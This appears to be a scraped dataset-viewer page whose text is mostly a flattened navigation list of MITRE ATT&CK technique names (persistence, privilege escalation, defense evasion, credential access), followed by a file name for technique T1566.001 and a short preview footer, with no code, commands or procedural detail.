Helper DLL Accessibility Features AppCert DLLs AppInit DLLs Application Shimming Image File Execution Options Injection PowerShell Profile Emond Component Object Model Hijacking Installer Packages External Remote Services Hijack Execution Flow DLL Search Order Hijacking DLL Side-Loading Dylib Hijacking Executable Installer File Permissions Weakness Dynamic Linker Hijacking Path Interception by PATH Environment Variable Path Interception by Search Order Hijacking Path Interception by Unquoted Path Services File Permissions Weakness Services Registry Permissions Weakness COR_PROFILER KernelCallbackTable Implant Internal Image Modify Authentication Process Domain Controller Authentication Password Filter DLL Pluggable Authentication Modules Network Device Authentication Reversible Encryption Multi-Factor Authentication Hybrid Identity Office Application Startup Office Template Macros Office Test Outlook Forms Outlook Home Page Outlook Rules Add-ins Pre-OS Boot System Firmware Component Firmware Bootkit ROMMONkit TFTP Boot Scheduled Task/Job At Cron Launchd Scheduled Task Systemd Timers Container Orchestration Job Server Software Component SQL Stored Procedures Transport Agent Web Shell IIS Components Terminal Services DLL Traffic Signaling Port Knocking Socket Filters Valid Accounts Default Accounts Domain Accounts Local Accounts Cloud Accounts Privilege Escalation Abuse Elevation Control Mechanism Setuid and Setgid Bypass User Account Control Sudo and Sudo Caching Elevated Execution with Prompt Access Token Manipulation Token Impersonation/Theft Create Process with Token Make and Impersonate Token Parent PID Spoofing SID-History Injection Boot or Logon Autostart Execution Registry Run Keys / Startup Folder Authentication Package Time Providers Winlogon Helper DLL Security Support Provider Kernel Modules and Extensions Re-opened Applications LSASS Driver Shortcut Modification Port Monitors Print Processors XDG Autostart Entries Active Setup Login Items Boot or Logon Initialization Scripts Logon Script (Windows) Login Hook Network Logon Script RC Scripts Startup Items Create or Modify System Process Launch Agent Systemd Service Windows Service Launch Daemon Domain Policy Modification Group Policy Modification Domain Trust Modification Escape to Host Event Triggered Execution Change Default File Association Screensaver Windows Management Instrumentation Event Subscription Unix Shell Configuration Modification Trap LC_LOAD_DYLIB Addition Netsh Helper DLL Accessibility Features AppCert DLLs AppInit DLLs Application Shimming Image File Execution Options Injection PowerShell Profile Emond Component Object Model Hijacking Installer Packages Exploitation for Privilege Escalation Hijack Execution Flow DLL Search Order Hijacking DLL Side-Loading Dylib Hijacking Executable Installer File Permissions Weakness Dynamic Linker Hijacking Path Interception by PATH Environment Variable Path Interception by Search Order Hijacking Path Interception by Unquoted Path Services File Permissions Weakness Services Registry Permissions Weakness COR_PROFILER KernelCallbackTable Process Injection Dynamic-link Library Injection Portable Executable Injection Thread Execution Hijacking Asynchronous Procedure Call Thread Local Storage Ptrace System Calls Proc Memory Extra Window Memory Injection Process Hollowing Process Doppelgänging VDSO Hijacking ListPlanting Scheduled Task/Job At Cron Launchd Scheduled Task Systemd Timers Container Orchestration Job Valid Accounts Default Accounts Domain Accounts Local Accounts Cloud Accounts Defense Evasion Abuse Elevation Control Mechanism Setuid and Setgid Bypass User Account Control Sudo and Sudo Caching Elevated Execution with Prompt Access Token Manipulation Token Impersonation/Theft Create Process with Token Make and Impersonate Token Parent PID Spoofing SID-History Injection BITS Jobs Build Image on Host Debugger Evasion Deobfuscate/Decode Files or Information Deploy Container Direct Volume Access Domain Policy Modification Group Policy Modification Domain Trust Modification Execution Guardrails Environmental Keying Exploitation for Defense Evasion File and Directory Permissions Modification Windows File and Directory Permissions Modification Linux and Mac File and Directory Permissions Modification Hide Artifacts Hidden Files and Directories Hidden Users Hidden Window NTFS File Attributes Hidden File System Run Virtual Instance VBA Stomping Email Hiding Rules Resource Forking Process Argument Spoofing Hijack Execution Flow DLL Search Order Hijacking DLL Side-Loading Dylib Hijacking Executable Installer File Permissions Weakness Dynamic Linker Hijacking Path Interception by PATH Environment Variable Path Interception by Search Order Hijacking Path Interception by Unquoted Path Services File Permissions Weakness Services Registry Permissions Weakness COR_PROFILER KernelCallbackTable Impair Defenses Disable or Modify Tools Disable Windows Event Logging Impair Command History Logging Disable or Modify System Firewall Indicator Blocking Disable or Modify Cloud Firewall Disable Cloud Logs Safe Mode Boot Downgrade Attack Indicator Removal Clear Windows Event Logs Clear Linux or Mac System Logs Clear Command History File Deletion Network Share Connection Removal Timestomp Clear Network Connection History and Configurations Clear Mailbox Data Clear Persistence Indirect Command Execution Masquerading Invalid Code Signature Right-to-Left Override Rename System Utilities Masquerade Task or Service Match Legitimate Name or Location Space after Filename Double File Extension Modify Authentication Process Domain Controller Authentication Password Filter DLL Pluggable Authentication Modules Network Device Authentication Reversible Encryption Multi-Factor Authentication Hybrid Identity Modify Cloud Compute Infrastructure Create Snapshot Create Cloud Instance Delete Cloud Instance Revert Cloud Instance Modify Registry Modify System Image Patch System Image Downgrade System Image Network Boundary Bridging Network Address Translation Traversal Obfuscated Files or Information Binary Padding Software Packing Steganography Compile After Delivery Indicator Removal from Tools HTML Smuggling Dynamic API Resolution Stripped Payloads Embedded Payloads Plist File Modification Pre-OS Boot System Firmware Component Firmware Bootkit ROMMONkit TFTP Boot Process Injection Dynamic-link Library Injection Portable Executable Injection Thread Execution Hijacking Asynchronous Procedure Call Thread Local Storage Ptrace System Calls Proc Memory Extra Window Memory Injection Process Hollowing Process Doppelgänging VDSO Hijacking ListPlanting Reflective Code Loading Rogue Domain Controller Rootkit Subvert Trust Controls Gatekeeper Bypass Code Signing SIP and Trust Provider Hijacking Install Root Certificate Mark-of-the-Web Bypass Code Signing Policy Modification System Binary Proxy Execution Compiled HTML File Control Panel CMSTP InstallUtil Mshta Msiexec Odbcconf Regsvcs/Regasm Regsvr Rundll Verclsid Mavinject MMC System Script Proxy Execution PubPrn Template Injection Traffic Signaling Port Knocking Socket Filters Trusted Developer Utilities Proxy Execution MSBuild Unused/Unsupported Cloud Regions Use Alternate Authentication Material Application Access Token Pass the Hash Pass the Ticket Web Session Cookie Valid Accounts Default Accounts Domain Accounts Local Accounts Cloud Accounts Virtualization/Sandbox Evasion System Checks User Activity Based Checks Time Based Evasion Weaken Encryption Reduce Key Space Disable Crypto Hardware XSL Script Processing Credential Access Adversary-in-the-Middle LLMNR/NBT-NS Poisoning and SMB Relay ARP Cache Poisoning DHCP Spoofing Brute Force Password Guessing Password Cracking Password Spraying Credential Stuffing Credentials from Password Stores Keychain Securityd Memory Credentials from Web Browsers Windows Credential Manager Password Managers Exploitation for Credential Access Forced Authentication Forge Web Credentials Web Cookies SAML Tokens Input Capture Keylogging GUI Input Capture Web Portal Capture Credential API Hooking Modify Authentication Process Domain Controller Authentication Password Filter DLL Pluggable Authentication Modules Network Device Authentication Reversible Encryption Multi-Factor Authentication Hybrid Identity Multi-Factor Authentication Interception Multi-Factor Authentication Request Generation Network Sniffing OS Credential Dumping LSASS Memory Security Account Manager NTDS LSA Secrets Cached Domain Credentials DCSync Proc Filesystem /etc/passwd and /etc/shadow Steal Application Access Token
versions_v12_techniques_T1566_001.txt
End of preview. Expand in Data Studio
README.md exists but content is empty.
Downloads last month
30